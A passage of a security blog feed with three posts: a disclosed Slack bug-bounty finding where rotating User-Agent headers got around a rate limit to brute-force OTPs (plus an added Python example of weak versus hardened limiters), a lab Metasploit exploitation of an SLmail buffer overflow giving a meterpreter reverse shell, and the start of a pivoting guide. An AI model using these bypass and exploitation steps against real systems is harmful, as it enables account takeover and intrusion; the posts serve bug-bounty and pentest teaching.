<b><br /></b></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-79744190769536549972017-04-11T16:38:00.000+05:302017-04-11T16:38:33.654+05:30Slack Rate Limit Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEKZThvyr6tNmOgG3ugAUdks_KhEUOHAUpErv6nCS_PfBv4lsNpu-HbJBKcXzT4-ln7xZDp4TvWye-HsrJ72CiQJZjMs3ymSHeUM9Df2rySo5eMVduJnkvDmeRG1FTIWzPzD5pxwX_UfM/s1600/slack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEKZThvyr6tNmOgG3ugAUdks_KhEUOHAUpErv6nCS_PfBv4lsNpu-HbJBKcXzT4-ln7xZDp4TvWye-HsrJ72CiQJZjMs3ymSHeUM9Df2rySo5eMVduJnkvDmeRG1FTIWzPzD5pxwX_UfM/s200/slack.png" width="200" /></a></div>
<h2 style="clear: both; text-align: center;">
<b>Slack Rate Limit Bypass</b></h2>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First of all, thanks to all readers for the appreciation I got in my inbox.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Today we will see how I was able to bypass the rate limit implemented in Slack for preventing automated/brute-force attempts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Rate limits are nowadays a very common thing; they can be found everywhere. Usually rate limits are deployed to prevent automated and brute-force attempts, such as brute-forcing OTPs (One Time Passwords) and user account passwords. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In recent months I have been working on the Slack Bug Bounty Program and, by God's grace, have found more than 15 valid vulnerabilities so far (some of them still in the fixing stage). One of the interesting vulnerabilities was the Slack Rate Limit Bypass. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First of all, I had reported a <b>"No Rate Limit Implemented" vulnerability on Slack (which was not true)</b> :p for the Slack mobile application endpoint "<span style="background-color: white; font-size: 13px;"><b>/api/auth.signin</b>"</span>. I was hoping for a positive response from the Slack guys, but the next day Slack replied that my report was not valid, as they did have a rate limit implemented. Now, what was wrong?</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFeOLFFxvzWjbTQ6mRfWSVXf-pPvKgvRDbppVqt6EEU2jxYoqpj449StgUomVFsyE0mgnS-pHWd3vxM76_PwcdGPpAY3ct61-ymH9DLF8yB74QatBPWHCrJY5aJbM06xY9op2JXHP7fF0/s1600/Screen+Shot+2016-11-20+at+11.11.46+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFeOLFFxvzWjbTQ6mRfWSVXf-pPvKgvRDbppVqt6EEU2jxYoqpj449StgUomVFsyE0mgnS-pHWd3vxM76_PwcdGPpAY3ct61-ymH9DLF8yB74QatBPWHCrJY5aJbM06xY9op2JXHP7fF0/s640/Screen+Shot+2016-11-20+at+11.11.46+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
This was my first POC (invalid)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/d1dknJXCPy4/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/d1dknJXCPy4?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGMBCIzuYuQF1WeTRd40kU_Cuq78gUIB8TR2Wv2pEtPiCMWzBBHDXwUXh_68rmHy9y8GxcRZTW7u3eL-fHjzvh3tkbn0eaW92FggA6gYhxGjaxRvSjrz9Z6yUhD_-l7bkiQYixclVXqB4/s1600/Screen+Shot+2016-11-20+at+11.14.19+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGMBCIzuYuQF1WeTRd40kU_Cuq78gUIB8TR2Wv2pEtPiCMWzBBHDXwUXh_68rmHy9y8GxcRZTW7u3eL-fHjzvh3tkbn0eaW92FggA6gYhxGjaxRvSjrz9Z6yUhD_-l7bkiQYixclVXqB4/s640/Screen+Shot+2016-11-20+at+11.14.19+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Actually, in my POC I was using Burp Free Edition, which throttles requests in Intruder attacks. </div>
<div class="separator" style="clear: both; text-align: left;">
That means I had tried only <b>100 attempts with a time throttle of 5 seconds</b> between requests, which does not look good. <b>As a result, the Slack rate limit was never triggered by just 100 throttled attempts; in a real attack scenario an attacker needs to send thousands of requests every minute.</b> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To confirm this behaviour, I tried 1000 attempts with 30 threads without time throttling. At the end of the attack I was silently rate limited, as the Slack team member had said :( </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
For a quick POC I had forgotten to try this same attack without time throttling. After much discussion, Slack finally closed my report as Informative, and I totally agreed with this decision.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT1X1Xk6cH2KwaFDCJxzBBu0jKOXkOXuo4X2FnLf3yykRKvD8MTidtssL6dzSfEAuugKAt-ltIXMZM3QvJbWEmDnAyyv3xGkeyXC2iuIDfqExpoCFS_odpr_AcO-wZP8Egt4A5bhBnjkY/s1600/closed.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT1X1Xk6cH2KwaFDCJxzBBu0jKOXkOXuo4X2FnLf3yykRKvD8MTidtssL6dzSfEAuugKAt-ltIXMZM3QvJbWEmDnAyyv3xGkeyXC2iuIDfqExpoCFS_odpr_AcO-wZP8Egt4A5bhBnjkY/s640/closed.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I was like</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://drkaylenehenderson.com/wp-content/uploads/2015/04/sad-kid.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://drkaylenehenderson.com/wp-content/uploads/2015/04/sad-kid.jpg" height="179" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
******</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After 2 days, I decided to give the same vulnerability another try. I tried different techniques, and finally one of them worked, which I also mention in my post <a href="http://www.websecgeeks.com/2015/06/bypass-brute-force-protection-login.html" target="_blank">http://www.websecgeeks.com/2015/06/bypass-brute-force-protection-login.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I sent every request with a different User-Agent value, with 100 threads :p and 1340 attempts in less than 40 seconds (very fast actually =D).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYS1Nrp-VwjG2fU099ArVuaR58PLiZWiuf9Hib0N3O9RgV5hccfXVeeaKHm1XjiGx3fVB8t2h2xnUv8qCCLc819k_a70Bydq4i9pBiNgJNPKlw5U7aMXQ05aH5ybVvsi3jRG6dlbfSDPk/s1600/Screen_Shot_2016-09-10_at_9.08.18_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYS1Nrp-VwjG2fU099ArVuaR58PLiZWiuf9Hib0N3O9RgV5hccfXVeeaKHm1XjiGx3fVB8t2h2xnUv8qCCLc819k_a70Bydq4i9pBiNgJNPKlw5U7aMXQ05aH5ybVvsi3jRG6dlbfSDPk/s640/Screen_Shot_2016-09-10_at_9.08.18_PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sck6hyphenhyphen8MprDPeWQqnaB6a4vbI2Ffil0onY3cPiyqo-ccFEovcPrLTg3eqaG_HPHeSXvQ-TeDRiXPnhpZ9Qcemsq81MkTP2XbIuZZG441_G7tscSwYaHv6Y0egqbQfu23BLCS6lIv3TY/s1600/Screen_Shot_2016-09-10_at_9.08.27_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sck6hyphenhyphen8MprDPeWQqnaB6a4vbI2Ffil0onY3cPiyqo-ccFEovcPrLTg3eqaG_HPHeSXvQ-TeDRiXPnhpZ9Qcemsq81MkTP2XbIuZZG441_G7tscSwYaHv6Y0egqbQfu23BLCS6lIv3TY/s320/Screen_Shot_2016-09-10_at_9.08.27_PM.png" width="307" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This tricked the Slack rate-limit logic into treating/counting every attempt as a new request, so the counter never reached its threshold. As a result, an attacker can perform tons of attempts on different endpoints, such as the OTP (One Time Password, "<span style="background-color: white; font-size: 13px;"><b>/api/auth.signin</b>"</span>) and password endpoints. (Slack was not using a strong password enforcement policy, hence a user could set a password like "<b>abc123</b>", which can be cracked easily.)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Below, we can see that attempt number 1340 responded without "<b>invalid pin</b>", which indicates a different response (one carrying OAuth tokens, xxid etc.) compared to the other attempts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcfzLGQM-SEakW2fU2BbOJjeDl4GpdGb4-YonvMk2P8Q-pNgFOQA1DJvmm4Td6Ly-HH-YBq1NJM8qFF1z4LodEeSE3DosgzUt4MCbOpq4c1ortE5HFPcBl_p2YhPW6wcqJEiVogEo88zs/s1600/Screen_Shot_2016-09-10_at_9.10.02_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcfzLGQM-SEakW2fU2BbOJjeDl4GpdGb4-YonvMk2P8Q-pNgFOQA1DJvmm4Td6Ly-HH-YBq1NJM8qFF1z4LodEeSE3DosgzUt4MCbOpq4c1ortE5HFPcBl_p2YhPW6wcqJEiVogEo88zs/s640/Screen_Shot_2016-09-10_at_9.10.02_PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Second POC video with 1340 attempts, without time throttling </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/tt6q6Fu35G8/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/tt6q6Fu35G8?feature=player_embedded" width="320"></iframe><br />
Finally I started dancing :p<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikXNeaT4Jc5w0UYPqzRLRdcX5Q9A9vVLKbQnYmYGDOsKrnDyX8-xjyANugejLEcyLf_I_cGIIUh0nkRxiPaPb061MJBJ7y15b-EnFE7GXmRq_4aCI8JRjHE5fFedyhPQoGyI8lRtrVSjQ/s1600/dancing.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikXNeaT4Jc5w0UYPqzRLRdcX5Q9A9vVLKbQnYmYGDOsKrnDyX8-xjyANugejLEcyLf_I_cGIIUh0nkRxiPaPb061MJBJ7y15b-EnFE7GXmRq_4aCI8JRjHE5fFedyhPQoGyI8lRtrVSjQ/s1600/dancing.gif" /></a></div>
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
This vulnerability allowed me to brute force the user authentication & OTP end points.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
After the fix, Slack deployed a strict rate limit logic.</div>
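<div class="separator" style="clear: both; text-align: left;">
Added example (not code from the original post or from Slack): a naive OTP rate limiter beside a hardened one that keys its counter on the target account and end-point rather than on anything the client sends. The post does not say exactly how the Slack limiter was tricked, so the weak limiter's per-request key is an assumption; the account name, end-point string and thresholds are made up.</div>

```python
# Added example, not code from the original post or from Slack: a naive OTP
# rate limiter next to a hardened one, modelling the bug class described above.
# ASSUMPTION: the post does not say how Slack's limiter was tricked; the weak
# limiter here keys its counter on a value the client sends with each request,
# which is one way a limiter ends up counting every attempt as "new".
import time
from collections import defaultdict

MAX_ATTEMPTS = 5        # guesses allowed per account and endpoint per window
WINDOW_SECONDS = 600    # sliding window length
LOCKOUT_SECONDS = 900   # how long the (account, endpoint) pair stays locked


class FakeClock:
    """Deterministic clock so the simulation below is reproducible offline."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


class WeakOtpLimiter:
    """Weak design: counter keyed on (account, client_request_id).

    Because the client chooses client_request_id, a fresh value per request
    gives a fresh counter, so the limit never trips.
    """

    def __init__(self):
        self.counts = defaultdict(int)

    def allow(self, account, client_request_id):
        key = (account, client_request_id)
        self.counts[key] += 1
        return self.counts[key] <= MAX_ATTEMPTS


class AccountOtpLimiter:
    """Hardened design: counter keyed only on server-side facts.

    The key is (target account, endpoint). Nothing the client sends can move
    an attempt into a different bucket, and hitting the limit locks the pair.
    """

    def __init__(self, now=time.monotonic):
        self.now = now
        self.attempts = defaultdict(list)   # (account, endpoint) -> timestamps
        self.locked_until = {}

    def allow(self, account, endpoint):
        key = (account, endpoint)
        t = self.now()
        if self.locked_until.get(key, 0.0) > t:
            return False
        recent = [ts for ts in self.attempts[key] if t - ts < WINDOW_SECONDS]
        recent.append(t)
        self.attempts[key] = recent
        if len(recent) > MAX_ATTEMPTS:
            self.locked_until[key] = t + LOCKOUT_SECONDS
            return False
        return True

    def record_success(self, account, endpoint):
        # A valid code clears the window; a lockout already in force still applies.
        self.attempts.pop((account, endpoint), None)


def simulate_weak(attempts):
    """Guesses against the weak limiter, each carrying a new client request id."""
    limiter = WeakOtpLimiter()
    return sum(limiter.allow("victim@example.com", f"req-{i}")
               for i in range(attempts))


def simulate_hardened(attempts, clock=None):
    """The same guesses against the hardened limiter; returns how many got through."""
    limiter = AccountOtpLimiter(now=clock or time.monotonic)
    return sum(limiter.allow("victim@example.com", "/api/auth.signin")
               for _ in range(attempts))


if __name__ == "__main__":
    print("weak limiter let through:", simulate_weak(1340))          # 1340
    print("hardened limiter let through:", simulate_hardened(1340))  # 5
```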
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Slack rewarded $500 for this vulnerability.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Full report can be found here - <a href="https://hackerone.com/reports/165727" target="_blank">https://hackerone.com/reports/165727</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Comments are always welcome.</div>
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com5tag:blogger.com,1999:blog-3462277729309057123.post-28590027809476045562017-04-11T16:31:00.000+05:302017-04-11T16:36:52.491+05:30Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWHzO0sWg5VmD9hWMb8O5DEuniVlbp5rGG_kW_GvC2NR5GDCSp_gT0hMYQcqOTDdxKsmEw0ZL6MTWVdclAUeFcTjK-KSId3FqqtwKWALB0_9QOHrjJsMpWLXepOp9szhCemYskfk65O0/s1600/security_exploits-642x428-300x300.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTWHzO0sWg5VmD9hWMb8O5DEuniVlbp5rGG_kW_GvC2NR5GDCSp_gT0hMYQcqOTDdxKsmEw0ZL6MTWVdclAUeFcTjK-KSId3FqqtwKWALB0_9QOHrjJsMpWLXepOp9szhCemYskfk65O0/s1600/security_exploits-642x428-300x300.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
<b>Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network </b><b><br /></b></h2>
<div>
<b><br /></b></div>
<div>
Vulnerabilities on a particular machine can be software or hardware based. Today we will see how we can exploit software based vulnerabilities to take over the target machine.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Software based vulnerabilities are nothing but coding/programming errors that exist in a particular software version or series, which can be compromised using a piece of malicious code called an "Exploit".</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
First we identified an SMTP service on our target machine 192.168.131.137.</div>
<div>
<br /></div>
<div>
SLmail smtpd 5.5.0 4433 is running on port 25. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGq7f79WqiKQvGkbmzeq0m_RHA-b6n3lM2mUMJGBFKiWAgFlMpoXtAizyLRkgCrf2ZOviFVtdSDKmFzmzTPP3DFFFilFaa3iGG1ZE83DvQrPV9MAZo6wF8I8HEqmyLjClFPspJyqCy1yc/s1600/Screen+Shot+2017-04-10+at+10.51.28+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGq7f79WqiKQvGkbmzeq0m_RHA-b6n3lM2mUMJGBFKiWAgFlMpoXtAizyLRkgCrf2ZOviFVtdSDKmFzmzTPP3DFFFilFaa3iGG1ZE83DvQrPV9MAZo6wF8I8HEqmyLjClFPspJyqCy1yc/s640/Screen+Shot+2017-04-10+at+10.51.28+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
A quick Google search shows that this particular software is vulnerable to a "Buffer Overflow" which allows a remote user to perform code execution.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.exploit-db.com/exploits/638/">https://www.exploit-db.com/exploits/638/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimnPfVgmok9knKODfDLzrIGXy6yH6rudJhm5Ap7x2TBnp4PNcMQWpzi7R448Ug7g4Ehv-86rAlNnc6BpDLumVjrJcPndbFo1UZVtL4h5__-t7zjNPUhq3j7SeCAW2JrE2tEeoYryATOy0/s1600/Screen+Shot+2017-04-10+at+10.55.41+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimnPfVgmok9knKODfDLzrIGXy6yH6rudJhm5Ap7x2TBnp4PNcMQWpzi7R448Ug7g4Ehv-86rAlNnc6BpDLumVjrJcPndbFo1UZVtL4h5__-t7zjNPUhq3j7SeCAW2JrE2tEeoYryATOy0/s640/Screen+Shot+2017-04-10+at+10.55.41+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now it's time to exploit this vulnerability on the target machine. From the exploit page I mentioned, we can download that exploit to run against the machine.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can also search for the exploit in Metasploit for quick exploitation. </div>
<div class="separator" style="clear: both; text-align: left;">
And yes, we have found a perfect match.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLHHegpKZnVmH2dGYLHuWZnwU2J-Pke6ptuqUBLolOgDXfSkm-HsbmRNQ6LLhHtFZ0WdsZLjcp2fCKjUvegANSXcMEqEY0_sYJMpPGbW8cuE6V3fUwbl7cmh891QD69Tb1F-nXHPI624/s1600/Screen+Shot+2017-04-10+at+11.10.17+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjLHHegpKZnVmH2dGYLHuWZnwU2J-Pke6ptuqUBLolOgDXfSkm-HsbmRNQ6LLhHtFZ0WdsZLjcp2fCKjUvegANSXcMEqEY0_sYJMpPGbW8cuE6V3fUwbl7cmh891QD69Tb1F-nXHPI624/s640/Screen+Shot+2017-04-10+at+11.10.17+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I used this exploit and selected the Windows meterpreter payload.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now set the required values: RHOST=targetmachine, LHOST=attackerip, LPORT=attackerport.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ44vndgBmD8j56ov7ailAkiS_my_tf7xI0EBJGPx8rAMPJNpYvvsK9BUF70kISJ1aMhRZcqGrtPPWrxosTHjXRrXGbFdWyVJDxNz_qVs7GEvDsJPrezf8MBPFAe1i64uTk3MuXB8sLJk/s1600/Screen+Shot+2017-04-10+at+11.11.55+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ44vndgBmD8j56ov7ailAkiS_my_tf7xI0EBJGPx8rAMPJNpYvvsK9BUF70kISJ1aMhRZcqGrtPPWrxosTHjXRrXGbFdWyVJDxNz_qVs7GEvDsJPrezf8MBPFAe1i64uTk3MuXB8sLJk/s640/Screen+Shot+2017-04-10+at+11.11.55+AM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After setting all values, type exploit and press enter.</div>
<div class="separator" style="clear: both; text-align: left;">
If all goes well you will get a meterpreter reverse shell. :) </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYr0dyKAfc4OpvNb-0aivB8UvYc8Uf-CjFOHncdJV5QdjlS6w6RA2l2k21OtngA1ZQJYVzYqCu0X-gmyk107AcfNrCiySGfBnDKHTyNRu6Ijygh5xxwTUNiE2lsikVjtXJ48_C803MuE/s1600/Screen+Shot+2017-04-10+at+11.14.15+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUYr0dyKAfc4OpvNb-0aivB8UvYc8Uf-CjFOHncdJV5QdjlS6w6RA2l2k21OtngA1ZQJYVzYqCu0X-gmyk107AcfNrCiySGfBnDKHTyNRu6Ijygh5xxwTUNiE2lsikVjtXJ48_C803MuE/s640/Screen+Shot+2017-04-10+at+11.14.15+AM.png" width="640" /></a></div>
<br />
<div style="text-align: center;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-67194922248282634332017-04-10T14:57:00.001+05:302017-04-11T16:37:10.206+05:30Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMRwhPIZkrj1M0jWXZW2mG0D9uncEXV0vimZZWznm4VrPXgZhYoPTvoRrlEIxiTfnt-yWepNh7CmsQW6MKcEdq4tuzVFjqFNL0MbNMqsG5XKih2qToF0CbcT6bXyVzNG8J9Jfs3fNZYc/s1600/Screen+Shot+2017-04-10+at+3.04.06+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuMRwhPIZkrj1M0jWXZW2mG0D9uncEXV0vimZZWznm4VrPXgZhYoPTvoRrlEIxiTfnt-yWepNh7CmsQW6MKcEdq4tuzVFjqFNL0MbNMqsG5XKih2qToF0CbcT6bXyVzNG8J9Jfs3fNZYc/s640/Screen+Shot+2017-04-10+at+3.04.06+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network </h2>
<div>
<br /></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">The Metasploit pivot technique helps an attacker compromise other machines which the attacker does not have direct access to.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">So the scenario would be like below.</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Attacker: 192.168.23.X</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">Attacker Can Communicate With System A: 192.168.31.X</span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;">System A Can Only Communicate With System B: 10.1.1.X</span></div>
<div>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">Attacker Wants To Communicate With Other Systems Using System B.</span></span><br />
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;">We also assume that the attacker has no idea of the System C IP address.</span></span></div>
<div>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span>
<span style="background-color: white; color: #3a3a3a; font-family: "open sans" , sans-serif; font-size: 17px;"><br /></span>
<span style="color: #3a3a3a; font-family: "open sans" , sans-serif;"><span style="background-color: white; font-size: 17px;"><br /></span></span>
<br />
<div style="background-color: white; border: 0px; color: #3a3a3a; font-family: "Open Sans", sans-serif; font-size: 17px; margin-bottom: 1.5em; outline: 0px; padding: 0px;">
Pivoting can be performed in the following steps:</div>
<ol style="background-color: white; border: 0px; color: #3a3a3a; font-family: "Open Sans", sans-serif; font-size: 17px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 1.5em 3em; outline: 0px; padding: 0px;">
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Compromise primary target machine (System A)</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Search for System network interfaces.</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Add route to metasploit session of System A.</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Run Proxy server</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Scan the Second target machine (System B)</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Port forwarding</li>
<li style="border: 0px; margin: 0px; outline: 0px; padding: 0px;">Perform Exploit</li>
</ol>
<div>
